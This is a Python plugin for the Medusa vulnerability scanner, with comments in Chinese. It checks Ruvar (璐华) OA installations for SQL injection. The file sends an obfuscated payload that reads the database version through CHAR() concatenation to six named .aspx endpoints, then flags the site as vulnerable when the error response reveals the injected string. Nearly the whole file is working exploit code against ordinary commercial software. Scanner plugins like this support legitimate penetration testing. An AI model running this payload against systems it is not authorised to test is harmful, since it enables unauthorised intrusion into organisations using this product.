#!/usr/bin/env python
# -*- coding: utf-8 -*-

import urllib.parse
import requests
import ClassCongregation
class VulnerabilityInfo(object):
    def __init__(self,Medusa):
        self.info = {}
        self.info['number']="0" #如果没有CVE或者CNVD编号就填0，CVE编号优先级大于CNVD
        self.info['author'] = "Ascotbe"  # 插件作者
        self.info['create_date'] = "2019-10-13"  # 插件编辑时间
        self.info['disclosure']='2019-10-13'#漏洞披露时间，如果不知道就写编写插件的时间
        self.info['algroup'] = "RuvarSystemSQLInjectionVulnerability"  # 插件名称
        self.info['name'] ='璐华系统SQL注入漏洞' #漏洞名称
        self.info['affects'] = "璐华OA"  # 漏洞组件
        self.info['desc_content'] = "无"  # 漏洞描述
        self.info['rank'] = "高危"  # 漏洞等级
        self.info['suggest'] = "尽快升级最新系统"  # 修复建议
        self.info['version'] = "无"  # 这边填漏洞影响的版本
        self.info['details'] = Medusa  # 结果需要传入的恒定不变


payload = "ChAr(71)%2BChAr(81)%2BChAr(88)%2B@@VeRsIoN"
urls = ["/flow/flow_get_if_value.aspx?template_id=",
        "/include/get_dict.aspx?bt_id=",
        "/LHMail/email_attach_delete.aspx?attach_id=",
        "/OnlineChat/chat_show.aspx?id=",
        "/OnlineChat/chatroom_show.aspx?id=",
        "/OnlineReport/get_condiction.aspx?t_id="]
def medusa(**kwargs)->None:
    url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    for turl in urls:
        try:
            payload_url = url+turl+payload

            resp = requests.get(payload_url,headers=Headers,proxies=proxies, timeout=5, verify=False)
            con = resp.text
            code = resp.status_code
            if code==500 and con.lower().find('gqxmicrosoft')!=-1:
                Medusa = "{}存在璐华OA系统SQL注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
                ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info, resp, **kwargs).Write()  # 传入url和扫描到的数据
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ClassCongregation.ErrorHandling().Outlier(e, _)
            _l = ClassCongregation.ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)  # 调用写入类
